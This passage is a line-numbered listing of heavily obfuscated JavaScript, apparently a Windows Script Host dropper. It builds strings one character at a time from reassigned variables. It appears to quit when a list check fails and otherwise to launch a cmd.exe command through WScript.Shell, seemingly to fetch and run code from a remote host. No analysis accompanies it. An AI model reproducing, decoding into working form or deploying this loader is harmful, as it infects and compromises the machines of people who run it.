pgnuhrymy + bvwwh + jhtfyn + tlaycuwmg + izqvxtaa + bcldge + cfqskvlj + jhtfyn + znfaypwcz + tlaycuwmg + gzgek + jhtfyn + bvwwh + znfaypwcz + abxxldmaz + ewwbvykp + jhtfyn + bvwwh + izqvxtaa + bcldge + jclmmjdfo + ewwbvykp + jtvviz + bvwwh + izqvxtaa + tlaycuwmg ), 16 ); |
|
3 | for ( dvttqmtxh = 0 ; dvttqmtxh < qhzjkzd[izqvxtaa + tlaycuwmg + jhtfyn + amyhx + znfaypwcz + ylfvkvkhr] ; ++ dvttqmtxh ) | |
4 | { | |
5 | if ( ashdydo == qhzjkzd[dvttqmtxh] ) | |
6 | { | |
7 | ashdydo = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( ashdydo !== true ) | |
12 | this[ilukledq + tifmgysgb + jtvviz + gzgek + abxxldmaz + ktgpqdz + znfaypwcz][fjbxpn + gndfbva + abxxldmaz + znfaypwcz] ( ); | |
13 | this[ilukledq + tifmgysgb + jtvviz + gzgek + abxxldmaz + ktgpqdz + znfaypwcz][tuisssgb + gzgek + tlaycuwmg + bvwwh + znfaypwcz + tlaycuwmg + tsvgtsa + bzvwhcb + peemmc + tlaycuwmg + jtvviz + znfaypwcz] ( ilukledq + tifmgysgb + jtvviz + gzgek + abxxldmaz + ktgpqdz + znfaypwcz + xjmnfbmb + tifmgysgb + ylfvkvkhr + tlaycuwmg + izqvxtaa + izqvxtaa ) [gzgek + gndfbva + jhtfyn] ( jtvviz + gynqb + shwlqequ + xuvhkoj + jiigyk + jtvviz + xuvhkoj + ktgpqdz + ewwbvykp + mlpwmrfwz + tlaycuwmg + gzgek + bwbzhcvfw + ylfvkvkhr + tlaycuwmg + izqvxtaa + izqvxtaa + xjmnfbmb + tlaycuwmg + rsrmenjp + tlaycuwmg + xuvhkoj + waihq + tuisssgb + ewwbvykp + gynqb + gynqb + bvwwh + jhtfyn + shwlqequ + xuvhkoj + vbhqodk + cfqskvlj + jhtfyn + waxant + ewwbvykp + qledvgj + tlaycuwmg + waihq + ilukledq + tlaycuwmg + bzvwhcb + pjybzdo + tlaycuwmg + laubkhqkm + gndfbva + tlaycuwmg + bwbzhcvfw + znfaypwcz + xuvhkoj + waihq + tsvgtsa + gndfbva + znfaypwcz + zrsewurxl + abxxldmaz + izqvxtaa + tlaycuwmg + xuvhkoj + uuyvyq + znfaypwcz + tlaycuwmg + gynqb + ktgpqdz + uuyvyq + bcldge + abxxldmaz + jhtfyn + waxant + ewwbvykp + abxxldmaz + jtvviz + tlaycuwmg + xjmnfbmb + ktgpqdz + shwlqequ + eoaves + xuvhkoj + ylfvkvkhr + znfaypwcz + znfaypwcz + ktgpqdz + lwdpkfyo + jiigyk + jiigyk + ffkbd + xlqnhtbb + secprbjlo + xjmnfbmb + ffkbd + dphduhshg + secprbjlo + xjmnfbmb + ffkbd + xjmnfbmb + mzyvtr + phibypc + iylfrme + jiigyk + abxxldmaz + jhtfyn + waxant + ewwbvykp + abxxldmaz + jtvviz + tlaycuwmg + xjmnfbmb + ktgpqdz + ylfvkvkhr + ktgpqdz + vbhqodk + bfsyze + bfsyze + bwbzhcvfw + znfaypwcz + bvwwh + gzgek + znfaypwcz + xuvhkoj + uuyvyq + znfaypwcz + tlaycuwmg + gynqb + ktgpqdz + uuyvyq + bcldge + abxxldmaz + jhtfyn + waxant + ewwbvykp + abxxldmaz + jtvviz + tlaycuwmg + xjmnfbmb + ktgpqdz + shwlqequ + eoaves + bfsyze + bfsyze + jtvviz + gynqb + shwlqequ + xuvhkoj + jiigyk + jtvviz + xuvhkoj + jhtfyn + tlaycuwmg + znfaypwcz + xuvhkoj + gndfbva + bwbzhcvfw + tlaycuwmg + xuvhkoj + bcldge + bcldge + ffkbd + xlqnhtbb + secprbjlo + xjmnfbmb + ffkbd + dphduhshg + secprbjlo + xjmnfbmb + ffkbd + xjmnfbmb + mzyvtr + phibypc + iylfrme + yhvhg + llmdxu + llmdxu + llmdxu + llmdxu + bcldge + shwlqequ + bvwwh + waxant + mlpwmrfwz + mlpwmrfwz + mlpwmrfwz + gzgek + ewwbvykp + ewwbvykp + znfaypwcz + bcldge + bfsyze + bfsyze + jtvviz + gynqb + shwlqequ + xuvhkoj + jiigyk + jtvviz + xuvhkoj + gzgek + tlaycuwmg + amyhx + bwbzhcvfw + waxant + gzgek + secprbjlo + mzyvtr + xuvhkoj + jiigyk + bwbzhcvfw + xuvhkoj + bcldge + bcldge + ffkbd + xlqnhtbb + secprbjlo + xjmnfbmb + ffkbd + dphduhshg + secprbjlo + xjmnfbmb + ffkbd + xjmnfbmb + mzyvtr + phibypc + iylfrme + yhvhg + llmdxu + llmdxu + llmdxu + llmdxu + bcldge + shwlqequ + bvwwh + waxant + mlpwmrfwz + mlpwmrfwz + mlpwmrfwz + gzgek + ewwbvykp + ewwbvykp + znfaypwcz + bcldge + mzyvtr + hkshlfxx + secprbjlo + mzyvtr + secprbjlo + mzyvtr + wqgbhs + xlqnhtbb + ffkbd + mzyvtr + hkshlfxx + phibypc + llmdxu + llmdxu + xjmnfbmb + shwlqequ + izqvxtaa + izqvxtaa, 0, false ); |
|
14 | } | |
15 | wqgbhs = "V"; | |
16 | wqgbhs = "u"; | |
17 | wqgbhs = "G"; | |
18 | wqgbhs = "K"; | |
19 | wqgbhs = "S"; | |
20 | wqgbhs = "V"; | |
21 | wqgbhs = "t"; | |
22 | wqgbhs = "c"; | |
23 | wqgbhs = "q"; | |
24 | wqgbhs = "s"; | |
25 | wqgbhs = "g"; | |
26 | wqgbhs = "M"; | |
27 | wqgbhs = "a"; | |
28 | wqgbhs = "7"; | |
29 | zrsewurxl = "S"; | |
30 | zrsewurxl = "o"; | |
31 | zrsewurxl = "x"; | |
32 | zrsewurxl = "i"; | |
33 | zrsewurxl = "v"; | |
34 | zrsewurxl = "F"; | |
35 | mlpwmrfwz = "H"; | |
36 | mlpwmrfwz = "h"; | |
37 | mlpwmrfwz = "k"; | |
38 | mlpwmrfwz = "m"; | |
39 | mlpwmrfwz = "e"; | |
40 | mlpwmrfwz = "R"; | |
41 | mlpwmrfwz = "w"; | |
42 | mlpwmrfwz = "y"; | |
43 | mlpwmrfwz = "R"; | |
44 | mlpwmrfwz = "m"; | |
45 | mlpwmrfwz = "X"; | |
46 | mlpwmrfwz = "J"; | |
47 | mlpwmrfwz = "y"; | |
48 | mlpwmrfwz = "N"; | |
49 | mlpwmrfwz = "x"; | |
50 | mlpwmrfwz = "P"; | |
51 | mlpwmrfwz = "h"; | |
52 | mlpwmrfwz = "N"; | |
53 | mlpwmrfwz = "S"; | |
54 | mlpwmrfwz = "B"; | |
55 | mlpwmrfwz = "n"; | |
56 | mlpwmrfwz = "I"; | |
57 | mlpwmrfwz = "K"; | |
58 | mlpwmrfwz = "n"; | |
59 | mlpwmrfwz = "p"; | |
60 | mlpwmrfwz = "H"; | |
61 | mlpwmrfwz = "P"; | |
62 | mlpwmrfwz = "T"; | |
63 | mlpwmrfwz = "i"; | |
64 | mlpwmrfwz = "Q"; | |
65 | mlpwmrfwz = "h"; | |
66 | mlpwmrfwz = "s"; | |
67 | mlpwmrfwz = "w"; | |
68 | gynqb = "T"; | |
69 | gynqb = "c"; | |
70 | gynqb = "N"; | |
71 | gynqb = "Z"; | |
72 | gynqb = "v"; | |
73 | gynqb = "c"; | |
74 | gynqb = "t"; | |
75 | gynqb = "q"; | |
76 | gynqb = "S"; | |
77 | gynqb = "q"; | |
78 | gynqb = "a"; | |
79 | gynqb = "n"; | |
80 | gynqb = "g"; | |
81 | gynqb = "L"; | |
82 | gynqb = "E"; | |
83 | gynqb = "L"; | |
84 | gynqb = "K"; | |
85 | gynqb = "z"; | |
86 | gynqb = "C"; | |
87 | gynqb = "u"; | |
88 | gynqb = "M"; | |
89 | gynqb = "L"; | |
90 | gynqb = "b"; | |
91 | gynqb = "V"; | |
92 | gynqb = "e"; | |
93 | gynqb = "O"; | |
94 | gynqb = "t"; | |
95 | gynqb = "I"; | |
96 | gynqb = "o"; | |
97 | gynqb = "E"; | |
98 | gynqb = "E"; | |
99 | gynqb = "v"; | |
100 | gynqb = "K"; | |
101 | gynqb = "N"; | |
102 | gynqb = "f"; | |
103 | gynqb = "w"; | |
104 | gynqb = "E"; | |
105 | gynqb = "n"; | |
106 | gynqb = "l"; | |
107 | gynqb = "P"; | |
108 | gynqb = "U"; | |
109 | gynqb = "m"; | |
110 | dphduhshg = "Z"; | |
111 | dphduhshg = "Z"; | |
112 | dphduhshg = "J"; | |
113 | dphduhshg = "l"; | |
114 | dphduhshg = "D"; | |
115 | dphduhshg = "k"; | |
116 | dphduhshg = "u"; | |
117 | dphduhshg = "T"; | |
118 | dphduhshg = "G"; | |
119 | dphduhshg = "u"; | |
120 | dphduhshg = "d"; | |
121 | dphduhshg = "p"; | |
122 | dphduhshg = "L"; | |
123 | dphduhshg = "n"; | |
124 | dphduhshg = "y"; | |
125 | dphduhshg = "p"; | |
126 | dphduhshg = "y"; | |
127 | dphduhshg = "b"; | |
128 | dphduhshg = "D"; | |
129 | dphduhshg = "m"; | |
130 | dphduhshg = "M"; | |
131 | dphduhshg = "B"; | |
132 | dphduhshg = "F"; | |
133 | dphduhshg = "U"; | |
134 | dphduhshg = "V"; | |
135 | dphduhshg = "K"; | |
136 | dphduhshg = "Z"; | |
137 | dphduhshg = "f"; | |
138 | dphduhshg = "L"; | |
139 | dphduhshg = "F"; | |
140 | dphduhshg = "K"; | |
141 | dphduhshg = "O"; | |
142 | dphduhshg = "g"; | |
143 | dphduhshg = "n"; | |
144 | dphduhshg = "T"; | |
145 | dphduhshg = "g"; | |
146 | dphduhshg = "W"; | |
147 | dphduhshg = "h"; | |
148 | dphduhshg = "Y"; | |
149 | dphduhshg = "o"; | |
150 | dphduhshg = "4"; | |
151 | bwbzhcvfw = "i"; | |
152 | bwbzhcvfw = "B"; | |
153 | bwbzhcvfw = "D"; | |
154 | bwbzhcvfw = "G"; | |
155 | bwbzhcvfw = "t"; | |
156 | bwbzhcvfw = "W"; | |
157 | bwbzhcvfw = "K"; | |
158 | bwbzhcvfw = "R"; | |
159 | bwbzhcvfw = "x"; | |
160 | bwbzhcvfw = "K"; | |
161 | bwbzhcvfw = "w"; | |
162 | bwbzhcvfw = "K"; | |
163 | bwbzhcvfw = "k"; | |
164 | bwbzhcvfw = "Z"; | |
165 | bwbzhcvfw = "v"; | |
166 | bwbzhcvfw = "n"; | |
167 | bwbzhcvfw = "c"; | |
168 | bwbzhcvfw = "n"; | |
169 | bwbzhcvfw = "H"; | |
170 | bwbzhcvfw = "j"; | |
171 | bwbzhcvfw = "q"; | |
172 | bwbzhcvfw = "X"; | |
173 | bwbzhcvfw = "t"; | |
174 | bwbzhcvfw = "t"; | |
175 | bwbzhcvfw = "C"; | |
176 | bwbzhcvfw = "v"; | |
177 | bwbzhcvfw = "q"; | |
178 | bwbzhcvfw = "q"; | |
179 | bwbzhcvfw = "o"; | |
180 | bwbzhcvfw = "c"; | |
181 | bwbzhcvfw = "V"; | |
182 | bwbzhcvfw = "i"; | |
183 | bwbzhcvfw = "A"; | |
184 | bwbzhcvfw = "F"; | |
185 | bwbzhcvfw = "t"; | |
186 | bwbzhcvfw = "g"; | |
187 | bwbzhcvfw = "K"; | |
188 | bwbzhcvfw = "R"; | |
189 | bwbzhcvfw = "U"; | |
190 | bwbzhcvfw = "i"; | |
191 | bwbzhcvfw = "r"; | |
192 | bwbzhcvfw = "r"; | |
193 | bwbzhcvfw = "s"; | |
194 | bzvwhcb = "u"; | |
195 | bzvwhcb = "D"; | |
196 | bzvwhcb = "z"; | |
197 | bzvwhcb = "U"; | |
198 | bzvwhcb = "E"; | |
199 | bzvwhcb = "z"; | |
200 | bzvwhcb = "T"; | |
201 | bzvwhcb = "v"; | |
202 | bzvwhcb = "G"; | |
203 | bzvwhcb = "R"; | |
204 | bzvwhcb = "L"; | |
205 | bzvwhcb = "X"; | |
206 | bzvwhcb = "c"; | |
207 | bzvwhcb = "l"; | |
208 | bzvwhcb = "H"; | |
209 | bzvwhcb = "K"; | |
210 | bzvwhcb = "n"; | |
211 | bzvwhcb = "Z"; | |
212 | bzvwhcb = "B"; | |
213 | bzvwhcb = "X"; | |
214 | bzvwhcb = "l"; | |
215 | bzvwhcb = "d"; | |
216 | bzvwhcb = "D"; | |
217 | bzvwhcb = "k"; | |
218 | bzvwhcb = "s"; | |
219 | bzvwhcb = "P"; | |
220 | bzvwhcb = "u"; | |
221 | bzvwhcb = "Z"; | |
222 | bzvwhcb = "Q"; | |
223 | bzvwhcb = "H"; | |
224 | bzvwhcb = "c"; | |
225 | bzvwhcb = "V"; | |
226 | bzvwhcb = "e"; | |
227 | bzvwhcb = "l"; | |
228 | bzvwhcb = "p"; | |
229 | bzvwhcb = "b"; | |
230 | ffkbd = "l"; | |
231 | ffkbd = "j"; | |
232 | ffkbd = "F"; | |
233 | ffkbd = "a"; | |
234 | ffkbd = "y"; | |
235 | ffkbd = "Z"; | |
236 | ffkbd = "w"; | |
237 | ffkbd = "M"; | |
238 | ffkbd = "A"; | |
239 | ffkbd = "t"; | |
240 | ffkbd = "D"; | |
241 | ffkbd = "y"; | |
242 | ffkbd = "p"; | |
243 | ffkbd = "M"; | |
244 | ffkbd = "g"; | |
245 | ffkbd = "J"; | |
246 | ffkbd = "b"; | |
247 | ffkbd = "G"; | |
248 | ffkbd = "z"; | |
249 | ffkbd = "R"; | |
250 | ffkbd = "p"; | |
251 | ffkbd = "e"; | |
252 | ffkbd = "I"; | |
253 | ffkbd = "Z"; | |
254 | ffkbd = "o"; | |
255 | ffkbd = "G"; | |
256 | ffkbd = "U"; | |
257 | ffkbd = "M"; | |
258 | ffkbd = "1"; | |
259 | tifmgysgb = "u"; | |
260 | tifmgysgb = "o"; | |
261 | tifmgysgb = "P"; | |
262 | tifmgysgb = "A"; | |
263 | tifmgysgb = "V"; | |
264 | tifmgysgb = "n"; | |
265 | tifmgysgb = "S"; | |
266 | jtvviz = "f"; | |
267 | jtvviz = "A"; | |
268 | jtvviz = "B"; | |
269 | jtvviz = "e"; | |
270 | jtvviz = "D"; | |
271 | jtvviz = "x"; | |
272 | jtvviz = "p"; | |
273 | jtvviz = "C"; | |
274 | jtvviz = "Q"; | |
275 | jtvviz = "S"; | |
276 | jtvviz = "J"; | |
277 | jtvviz = "c"; | |
278 | cfqskvlj = "g"; | |
279 | cfqskvlj = "Q"; | |
280 | cfqskvlj = "R"; | |
281 | cfqskvlj = "y"; | |
282 | cfqskvlj = "g"; | |
283 | cfqskvlj = "j"; | |
284 | cfqskvlj = "Y"; | |
285 | cfqskvlj = "p"; | |
286 | cfqskvlj = "t"; | |
287 | cfqskvlj = "B"; | |
288 | cfqskvlj = "F"; | |
289 | cfqskvlj = "P"; | |
290 | cfqskvlj = "y"; | |
291 | cfqskvlj = "p"; | |
292 | cfqskvlj = "O"; | |
293 | cfqskvlj = "D"; | |
294 | cfqskvlj = "v"; | |
295 | cfqskvlj = "S"; | |
296 | cfqskvlj = "C"; | |
297 | cfqskvlj = "w"; | |
298 | cfqskvlj = "P"; | |
299 | cfqskvlj = "H"; | |
300 | cfqskvlj = "p"; | |
301 | cfqskvlj = "h"; | |
302 | cfqskvlj = "I"; | |
303 | ewwbvykp = "v"; | |
304 | ewwbvykp = "f"; | |
305 | ewwbvykp = "U"; | |
306 | ewwbvykp = "k"; | |
307 | ewwbvykp = "h"; | |
308 | ewwbvykp = "W"; | |
309 | ewwbvykp = "L"; | |
310 | ewwbvykp = "P"; | |
311 | ewwbvykp = "s"; | |
312 | ewwbvykp = "G"; | |
313 | ewwbvykp = "X"; | |
314 | ewwbvykp = "p"; | |
315 | ewwbvykp = "T"; | |
316 | ewwbvykp = "u"; | |
317 | ewwbvykp = "X"; | |
318 | ewwbvykp = "o"; | |
319 | ewwbvykp = "l"; | |
320 | ewwbvykp = "o"; | |
321 | ewwbvykp = "x"; | |
322 | ewwbvykp = "a"; | |
323 | ewwbvykp = "O"; | |
324 | ewwbvykp = "r"; | |
325 | ewwbvykp = "J"; | |
326 | ewwbvykp = "o"; | |
327 | gzgek = "B"; | |
328 | gzgek = "W"; | |
329 | gzgek = "M"; | |
330 | gzgek = "m"; | |
331 | gzgek = "M"; | |
332 | gzgek = "g"; | |
333 | gzgek = "Z"; | |
334 | gzgek = "O"; | |
335 | gzgek = "J"; | |
336 | gzgek = "s"; | |
337 | gzgek = "h"; | |
338 | gzgek = "W"; | |
339 | gzgek = "a"; | |
340 | gzgek = "n"; | |
341 | gzgek = "O"; | |
342 | gzgek = "G"; | |
343 | gzgek = "x"; | |
344 | gzgek = "P"; | |
345 | gzgek = "s"; | |
346 | gzgek = "N"; | |
347 | gzgek = "X"; | |
348 | gzgek = "l"; | |
349 | gzgek = "G"; | |
350 | gzgek = "n"; | |
351 | gzgek = "r"; | |
352 | phibypc = "W"; | |
353 | phibypc = "q"; | |
354 | phibypc = "S"; | |
355 | phibypc = "M"; | |
356 | phibypc = "x"; | |
357 | phibypc = "f"; | |
358 | phibypc = "f"; | |
359 | phibypc = "m"; | |
360 | phibypc = "M"; | |
361 | phibypc = "x"; | |
362 | phibypc = "F"; | |
363 | phibypc = "A"; | |
364 | phibypc = "Q"; | |
365 | phibypc = "A"; | |
366 | phibypc = "K"; | |
367 | phibypc = "T"; | |
368 | phibypc = "A"; | |
369 | phibypc = "t"; | |
370 | phibypc = "J"; | |
371 | phibypc = "n"; | |
372 | phibypc = "d"; | |
373 | phibypc = "o"; | |
374 | phibypc = "M"; | |
375 | phibypc = "B"; | |
376 | phibypc = "a"; | |
377 | phibypc = "Y"; | |
378 | phibypc = "p"; | |
379 | phibypc = "f"; | |
380 | phibypc = "Q"; | |
381 | phibypc = "n"; | |
382 | phibypc = "C"; | |
383 | phibypc = "z"; | |
384 | phibypc = "Z"; | |
385 | phibypc = "p"; | |
386 | phibypc = "0"; | |
387 | znfaypwcz = "K"; | |
388 | znfaypwcz = "M"; | |
389 | znfaypwcz = "H"; | |
390 | znfaypwcz = "P"; | |
391 | znfaypwcz = "K"; | |
392 | znfaypwcz = "l"; | |
393 | znfaypwcz = "E"; | |
394 | znfaypwcz = "a"; | |
395 | znfaypwcz = "r"; | |
396 | znfaypwcz = "L"; | |
397 | znfaypwcz = "W"; | |
398 | znfaypwcz = "c"; | |
399 | znfaypwcz = "T"; | |
400 | znfaypwcz = "h"; | |
401 | znfaypwcz = "r"; | |
402 | znfaypwcz = "F"; | |
403 | znfaypwcz = "I"; | |
404 | znfaypwcz = "a"; | |
405 | znfaypwcz = "t"; | |
406 | znfaypwcz = "O"; | |
407 | znfaypwcz = "d"; | |
408 | znfaypwcz = "u"; | |
409 | znfaypwcz = "r"; | |
410 | znfaypwcz = "O"; | |
411 | znfaypwcz = "S"; | |
412 | znfaypwcz = "s"; | |
413 | znfaypwcz = "V"; | |
414 | znfaypwcz = "p"; | |
415 | znfaypwcz = "g"; | |
416 | znfaypwcz = "t"; | |
417 | pjybzdo = "J"; | |
418 | pjybzdo = "l"; | |
419 | pjybzdo = "i"; | |
420 | pjybzdo = "F"; | |
421 | pjybzdo = "N"; | |
422 | pjybzdo = "E"; | |
423 | pjybzdo = "C"; | |
424 | pjybzdo = "u"; | |
425 | pjybzdo = "n"; | |
426 | pjybzdo = "V"; | |
427 | pjybzdo = "C"; | |
428 | pjybzdo = "Z"; | |
429 | pjybzdo = "i"; | |
430 | pjybzdo = "V"; | |
431 | pjybzdo = "A"; | |
432 | pjybzdo = "d"; | |
433 | pjybzdo = "c"; | |
434 | pjybzdo = "e"; | |
435 | pjybzdo = "T"; | |
436 | pjybzdo = "A"; | |
437 | pjybzdo = "L"; | |
438 | pjybzdo = "C"; | |
439 | pjybzdo = "y"; | |
440 | pjybzdo = "O"; | |
441 | pjybzdo = "a"; | |
442 | pjybzdo = "S"; | |
443 | pjybzdo = "F"; | |
444 | pjybzdo = "b"; | |
445 | pjybzdo = "c"; | |
446 | pjybzdo = "U"; | |
447 | pjybzdo = "q"; | |
448 | pjybzdo = "d"; | |
449 | pjybzdo = "z"; | |
450 | pjybzdo = "R"; | |
451 | qledvgj = "z"; | |
452 | qledvgj = "t"; | |
453 | qledvgj = "r"; | |
454 | qledvgj = "v"; | |
455 | qledvgj = "v"; | |
456 | qledvgj = "e"; | |
457 | qledvgj = "k"; | |
458 | tlaycuwmg = "l"; | |
459 | tlaycuwmg = "Y"; | |
460 | tlaycuwmg = "Z"; | |
461 | tlaycuwmg = "i"; | |
462 | tlaycuwmg = "x"; | |
463 | tlaycuwmg = "N"; | |
464 | tlaycuwmg = "x"; | |
465 | tlaycuwmg = "j"; | |
466 | tlaycuwmg = "m"; | |
467 | tlaycuwmg = "m"; | |
468 | tlaycuwmg = "p"; | |
469 | tlaycuwmg = "U"; | |
470 | tlaycuwmg = "j"; | |
471 | tlaycuwmg = "h"; | |
472 | tlaycuwmg = "I"; | |
473 | tlaycuwmg = "C"; | |
474 | tlaycuwmg = "m"; | |
475 | tlaycuwmg = "y"; | |
476 | tlaycuwmg = "n"; | |
477 | tlaycuwmg = "Z"; | |
478 | tlaycuwmg = "U"; | |
479 | tlaycuwmg = "e"; | |
480 | minial = "s"; | |
481 | minial = "X"; | |
482 | minial = "Q"; | |
483 | minial = "R"; | |
484 | minial = "D"; | |
485 | minial = "Y"; | |
486 | minial = "u"; | |
487 | minial = "P"; | |
488 | minial = "i"; | |
489 | minial = "e"; | |
490 | minial = "A"; | |
491 | minial = "s"; | |
492 | minial = "y"; | |
493 | minial = "q"; | |
494 | minial = "A"; | |
495 | minial = "P"; | |
496 | minial = "t"; | |
497 | minial = "T"; | |
498 | secprbjlo = "M"; | |
499 | secprbjlo = "s"; | |
500 | secprbjlo = "Y"; | |
501 | secprbjlo = "w"; | |
502 | secprbjlo = "w"; | |
503 | secprbjlo = "n"; | |
504 | secprbjlo = "w"; | |
505 | secprbjlo = "d"; | |
506 | secprbjlo = "y"; | |
507 | secprbjlo = "Y"; | |
508 | secprbjlo = "X"; | |
509 | secprbjlo = "s"; | |
510 | secprbjlo = "K"; | |
511 | secprbjlo = "u"; | |
512 | secprbjlo = "K"; | |
513 | secprbjlo = "i"; | |
514 | secprbjlo = "3"; | |
515 | mzyvtr = "A"; | |
516 | mzyvtr = "d"; | |
517 | mzyvtr = "O"; | |
518 | mzyvtr = "q"; | |
519 | mzyvtr = "D"; | |
520 | mzyvtr = "i"; | |
521 | mzyvtr = "I"; | |
522 | mzyvtr = "X"; | |
523 | mzyvtr = "k"; | |
524 | mzyvtr = "R"; | |
525 | mzyvtr = "w"; | |
526 | mzyvtr = "B"; | |
527 | mzyvtr = "g"; | |
528 | mzyvtr = "g"; | |
529 | mzyvtr = "z"; | |
530 | mzyvtr = "p"; | |
531 | mzyvtr = "Z"; | |
532 | mzyvtr = "O"; | |
533 | mzyvtr = "X"; | |
534 | mzyvtr = "z"; | |
535 | mzyvtr = "J"; | |
536 | mzyvtr = "Q"; | |
537 | mzyvtr = "m"; | |
538 | mzyvtr = "w"; | |
539 | mzyvtr = "C"; | |
540 | mzyvtr = "E"; | |
541 | mzyvtr = "w"; | |
542 | mzyvtr = "l"; | |
543 | mzyvtr = "m"; | |
544 | mzyvtr = "c"; | |
545 | mzyvtr = "M"; | |
546 | mzyvtr = "i"; | |
547 | mzyvtr = "j"; | |
548 | mzyvtr = "U"; | |
549 | mzyvtr = "M"; | |
550 | mzyvtr = "i"; | |
551 | mzyvtr = "B"; | |
552 | mzyvtr = "C"; | |
553 | mzyvtr = "m"; | |
554 | mzyvtr = "S"; | |
555 | mzyvtr = "D"; | |
556 | mzyvtr = "M"; | |
557 | mzyvtr = "2"; | |
558 | izqvxtaa = "F"; | |
559 | izqvxtaa = "t"; | |
560 | izqvxtaa = "s"; | |
561 | izqvxtaa = "J"; | |
562 | izqvxtaa = "D"; | |
563 | izqvxtaa = "C"; | |
564 | izqvxtaa = "l"; | |
565 | izqvxtaa = "y"; | |
566 | izqvxtaa = "n"; | |
567 | izqvxtaa = "s"; | |
568 | izqvxtaa = "g"; | |
569 | izqvxtaa = "N"; | |
570 | izqvxtaa = "e"; | |
571 | izqvxtaa = "p"; | |
572 | izqvxtaa = "T"; | |
573 | izqvxtaa = "M"; | |
574 | izqvxtaa = "s"; | |
575 | izqvxtaa = "v"; | |
576 | izqvxtaa = "G"; | |
577 | izqvxtaa = "S"; | |
578 | izqvxtaa = "B"; | |
579 | izqvxtaa = "R"; | |
580 | izqvxtaa = "t"; | |
581 | izqvxtaa = "k"; | |
582 | izqvxtaa = "A"; | |
583 | izqvxtaa = "H"; | |
584 | izqvxtaa = "f"; | |
585 | izqvxtaa = "O"; | |
586 | izqvxtaa = "h"; | |
587 | izqvxtaa = "u"; | |
588 | izqvxtaa = "s"; | |
589 | izqvxtaa = "A"; | |
590 | izqvxtaa = "x"; | |
591 | izqvxtaa = "z"; | |
592 | izqvxtaa = "l"; | |
593 | bfsyze = "y"; | |
594 | bfsyze = "I"; | |
595 | bfsyze = "G"; | |
596 | bfsyze = "l"; | |
597 | bfsyze = "g"; | |
598 | bfsyze = "x"; | |
599 | bfsyze = "U"; | |
600 | bfsyze = "S"; | |
601 | bfsyze = "O"; | |
602 | bfsyze = "W"; | |
603 | bfsyze = "Y"; | |
604 | bfsyze = "E"; | |
605 | bfsyze = "d"; | |
606 | bfsyze = "E"; | |
607 | bfsyze = "L"; | |
608 | bfsyze = "c"; | |
609 | bfsyze = "u"; | |
610 | bfsyze = "p"; | |
611 | bfsyze = "o"; | |
612 | bfsyze = "j"; | |
613 | bfsyze = "Q"; | |
614 | bfsyze = "O"; | |
615 | bfsyze = "D"; | |
616 | bfsyze = "a"; | |
617 | bfsyze = "Y"; | |
618 | bfsyze = "U"; | |
619 | bfsyze = "V"; | |
620 | bfsyze = "o"; | |
621 | bfsyze = "&"; | |
622 | pgnuhrymy = "j"; | |
623 | pgnuhrymy = "Q"; | |
624 | pgnuhrymy = "l"; | |
625 | pgnuhrymy = "b"; | |
626 | pgnuhrymy = "G"; | |
627 | pgnuhrymy = "t"; | |
628 | pgnuhrymy = "h"; | |
629 | pgnuhrymy = "p"; | |
630 | pgnuhrymy = "s"; | |
631 | pgnuhrymy = "f"; | |
632 | pgnuhrymy = "w"; | |
633 | pgnuhrymy = "b"; | |
634 | pgnuhrymy = "t"; | |
635 | pgnuhrymy = "I"; | |
636 | pgnuhrymy = "U"; | |
637 | pgnuhrymy = "j"; | |
638 | pgnuhrymy = "Y"; | |
639 | pgnuhrymy = "m"; | |
640 | pgnuhrymy = "m"; | |
641 | pgnuhrymy = "a"; | |
642 | pgnuhrymy = "P"; | |
643 | jiigyk = "s"; | |
644 | jiigyk = "w"; | |
645 | jiigyk = "O"; | |
646 | jiigyk = "D"; | |
647 | jiigyk = "q"; | |
648 | jiigyk = "N"; | |
649 | jiigyk = "W"; | |
650 | jiigyk = "q"; | |
651 | jiigyk = "d"; | |
652 | jiigyk = "x"; | |
653 | jiigyk = "P"; | |
654 | jiigyk = "A"; | |
655 | jiigyk = "K"; | |
656 | jiigyk = "n"; | |
657 | jiigyk = "F"; | |
658 | jiigyk = "q"; | |
659 | jiigyk = "J"; | |
660 | jiigyk = "t"; | |
661 | jiigyk = "E"; | |
662 | jiigyk = "i"; | |
663 | jiigyk = "j"; | |
664 | jiigyk = "p"; | |
665 | jiigyk = "H"; | |
666 | jiigyk = "Z"; | |
667 | jiigyk = "z"; | |
668 | jiigyk = "l"; | |
669 | jiigyk = "I"; | |
670 | jiigyk = "g"; | |
671 | jiigyk = "v"; | |
672 | jiigyk = "q"; | |
673 | jiigyk = "I"; | |
674 | jiigyk = "s"; | |
675 | jiigyk = "r"; | |
676 | jiigyk = "s"; | |
677 | jiigyk = "R"; | |
678 | jiigyk = "C"; | |
679 | jiigyk = "s"; | |
680 | jiigyk = "X"; | |
681 | jiigyk = "e"; | |
682 | jiigyk = "T"; | |
683 | jiigyk = "Z"; | |
684 | jiigyk = "V"; | |
685 | jiigyk = "/"; | |
686 | vbhqodk = "n"; | |
687 | vbhqodk = "y"; | |
688 | vbhqodk = "w"; | |
689 | vbhqodk = "z"; | |
690 | vbhqodk = "S"; | |
691 | vbhqodk = "R"; | |
692 | vbhqodk = "R"; | |
693 | vbhqodk = "W"; | |
694 | vbhqodk = "h"; | |
695 | vbhqodk = "a"; | |
696 | vbhqodk = "\""; | |
697 | bcldge = "N"; | |
698 | bcldge = "m"; | |
699 | bcldge = "J"; | |
700 | bcldge = "R"; | |
701 | bcldge = "A"; | |
702 | bcldge = "j"; | |
703 | bcldge = "c"; | |
704 | bcldge = "g"; | |
705 | bcldge = "y"; | |
706 | bcldge = "h"; | |
707 | bcldge = "I"; | |
708 | bcldge = "o"; | |
709 | bcldge = "f"; | |
710 | bcldge = "j"; | |
711 | bcldge = "e"; | |
712 | bcldge = "K"; | |
713 | bcldge = "m"; | |
714 | bcldge = "f"; | |
715 | bcldge = "G"; | |
716 | bcldge = "K"; | |
717 | bcldge = "X"; | |
718 | bcldge = "e"; | |
719 | bcldge = "Y"; | |
720 | bcldge = "q"; | |
721 | bcldge = "y"; | |
722 | bcldge = "b"; | |
723 | bcldge = "t"; | |
724 | bcldge = "P"; | |
725 | bcldge = "n"; | |
726 | bcldge = "\\"; | |
727 | jfdunreo = "J"; | |
728 | jfdunreo = "p"; | |
729 | jfdunreo = "o"; | |
730 | jfdunreo = "w"; | |
731 | jfdunreo = "G"; | |
732 | jfdunreo = "P"; | |
733 | jfdunreo = "I"; | |
734 | jfdunreo = "K"; | |
735 | jfdunreo = "I"; | |
736 | jfdunreo = "V"; | |
737 | jfdunreo = "Z"; | |
738 | jfdunreo = "J"; | |
